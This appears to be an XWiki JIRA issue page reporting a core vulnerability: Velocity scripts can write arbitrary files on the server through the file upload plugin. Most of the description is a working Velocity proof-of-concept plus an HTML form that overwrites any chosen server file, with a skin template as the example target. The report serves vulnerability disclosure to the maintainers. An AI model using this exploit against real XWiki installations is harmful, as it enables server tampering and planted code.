Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-5168

Arbitrary filesystem write access from velocity.

    XMLWordPrintable

    Details

    • Development Priority:
      Low
    • Difficulty:
      Medium
    • Documentation:
      N/A
    • Documentation in Release Notes:
      N/A
    • Pull Request Status:
      Awaiting Committer feedback
    • Similar issues:

      Description

      This sample exploit abuses the file upload plugin but I reported this as a core bug because the problem is not constrained to the file upload plugin and I suspect I can find at least a half dozen other places where it manifests.

      The root of the problem is that the File class is too widely available and thus too much code is relied upon to keep the filesystem safe.

      The goods:

      {{velocity}}
      #if($request.getContentType().startsWith('multipart/'))
        #foreach($file in $xwiki.get('fileupload').getFileItems())
          #set($f = $file.getStoreLocation())
          #set($fi = $file)
        #end
        #set($f = $f.getAbsoluteFile())
        #foreach($part in $f.getCanonicalPath().split('/'))
          #set($path = $f.getParentFile())
        #end
        #set($newf = $f.getParentFile().getParentFile())
        #foreach($part in $request.getParameter('filename').split('/'))
          #if($part != '')
            #if($use != '')
              #set($use = '')
              #foreach($subf in $newf.listFiles())
                #if($subf.getName() == $part)
                  #set($use = $subf)
                #end
              #end
              #if($use != '')
                #set($newf = $use)
              #end
            #else
              Couldn't find the dir/file to write to ($part)
              #set($failed = 1)
            #end
          #end
        #end
        #if(!$failed && $newf.delete() && $fi.write($newf))
          == **Win!** ==
        #end
      #end
      {{html clean=false}}
      <form action="$doc.getURL("view")" enctype="multipart/form-data" method="post">
      <dl><dt>Where to save:</dt><dd>
      <input type="text" name="filename" value="/usr/local/jetty-6.1.3/webapps/xwikiTrunk/skins/colibri/view.vm" size="80"/></dd>
      <dt>What to save:</dt><dd>
      <dd><input type="file" name="filepath" value="" size="40"/></dd>
      </dl>
      <input type="submit" value="Save!" class="button"/>
      </form>{{/html}}
      {{/velocity}}
      

        Attachments

          Issue Links

            Activity

              People

              Assignee:
              surli Simon Urli
              Reporter:
              calebjamesdelisle CalebJamesDeLisle
              Votes:
              0 Vote for this issue
              Watchers:
              4 Start watching this issue

                Dates

                Created:
                Updated:
                Resolved:
                Date of First Response: